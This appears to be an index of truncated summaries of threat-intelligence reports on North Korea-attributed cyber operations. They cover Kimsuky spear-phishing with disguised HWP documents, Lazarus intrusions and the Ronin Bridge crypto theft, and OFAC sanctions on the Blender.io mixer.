296 reports
ESRC reports a North Korea-attributed spear-phishing attack using an HWP document disguised as an invitation to appear on a KTV YouTube policy program. The lure targeted specialists in North Korea-related fields and used a malicious OLE object that displa…
AhnLab reported Kimsuky-linked attack attempts using malware disguised as press releases on topics including North Korea’s COVID-19 acknowledgement and other Korean public-announcement themes. The .NET executables used HWP or Word document icons, dropped …
Prelude released an APT38-themed emulation chain based on Castov malware used by DarkSeoul against South Korean financial industry and government targets. The excerpt says Castov acted as a downloader for second-stage malware, including payloads hidden in…
Recent Actions Notices General Licenses Issued by OFAC Civil Penalties and Enforcement Information Report Blocked and Rejected Transactions to OFAC Guidance for Specific Industries Sanctions Legal Library Other Sanctions-Related Resources Lists of individ…
In the recent Ronin Bridge hack attributed to North Korea’s Lazarus Group, the hackers made extensive use of Tornado Cash to launder some of the stolen cryptoassets from the heist, which at the time of the theft totalled $540 million. Unlike simple P2P ex…
AhnLab observed suspected Lazarus activity exploiting CVE-2021-44228 in unpatched VMware Horizon servers used for remote work and cloud infrastructure operations in South Korea. The intrusion deployed a NukeSped backdoor variant associated with Lazarus si…
Sophos profiles NICKEL KIMBALL as a North Korea-linked espionage group active since at least 2012 and aligned with aliases including Kimsuky, APT43, Emerald Sleet, THALLIUM, TA406, TA427, SharpTongue, and Velvet Chollima. The group targets NGOs, think tan…
Trend Micro's 2022 Japan targeted attack analysis observed four state-sponsored targeted-attack clusters in 2021, including Earth Kumiho/Kimsuky activity relevant to defense and diplomacy. The Earth Kumiho/Kimsuky section says the group was believed to ha…
ESTsecurity ESRC identified a North Korea-linked HWP document attack disguised as a survey for North Korean defector advisory committee members. The lure abused current news about anti-North Korea leaflet launches and displayed a fake HWP version message …
IssueMakersLab statistics cited by Boannews tracked suspected North Korean cyberattack activity from 2004 through 2021 and found it grew from five cases in 2004 to more than 300 times that level by 2021. The dataset includes activity attributed to Lazarus…
OFAC sanctioned Blender.io for the first time as part of an effort to disrupt laundering of funds stolen in the March 2022 Ronin Bridge hack attributed to North Korea's Lazarus Group. The action covered 45 Bitcoin addresses linked to Blender.io and four a…
South Korean prosecutors announced the arrest and indictment of a security offender accused of trying to recruit an active-duty officer and obtain military secrets under instructions from a North Korean agent. The press release states that the active-duty…
OFAC sanctioned Blender.io as the first virtual currency mixer designation, citing its use by DPRK’s Lazarus Group to launder proceeds from the March 2022 Axie Infinity/Ronin heist. Treasury said Lazarus stole roughly $620 million from the blockchain proj…
NCC Group details Lazarus initial-access activity built around LinkedIn impersonation, WhatsApp contact, and job-themed ZIP files containing malicious Office documents. The lure infrastructure included global-job[.]org, a domain likely chosen to imitate a…